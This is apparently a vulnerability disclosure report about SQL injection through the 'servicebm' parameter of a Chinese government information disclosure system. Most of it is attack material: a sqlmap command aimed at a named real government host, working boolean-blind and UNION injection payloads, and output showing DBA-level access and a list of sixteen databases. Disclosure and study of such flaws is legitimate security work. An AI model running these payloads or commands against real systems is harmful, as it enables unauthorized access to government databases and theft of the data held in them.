### Brief description:
SQL

### Detailed description:
Government information disclosure system (政府信息公开系统): SQL injection at one location. This one is a parameter in a different file from the previously reported one.

Injection point: `zfxxgk/serviceobjectinfo.jsp?servicebm=`

The `servicebm` parameter is not filtered strictly and is injectable. Government website example:

```
sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/serviceobjectinfo.jsp?servicebm=" --is-dba --dbs
```

```
---
Place: GET
Parameter: servicebm
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: servicebm=%' AND 2512=2512 AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: servicebm=-5118%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(104)+CHAR(106)+CHAR(111)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR(103)+CHAR(84)+CHAR(77)+CHAR(118)+CHAR(100)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(111)+CHAR(113),NULL,NULL--
---
[11:57:12] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True
```

The current user has DBA privileges. Listing the databases:

```
available databases [16]:
[*] gov
[*] jcms
[*] jcmsvc
[*] jis
[*] lm
[*] mailbook
[*] master
[*] model
[*] msdb
[*] newlm
[*] Northwind
[*] pubs
[*] sms
[*] tempdb
[*] vipchat
[*] xxgk
```

### Proof of vulnerability:
![1.jpg](https://images.seebug.org/upload/201405/2022230917b784fd9ddc7b3eeab2e478a9423aaf.jpg)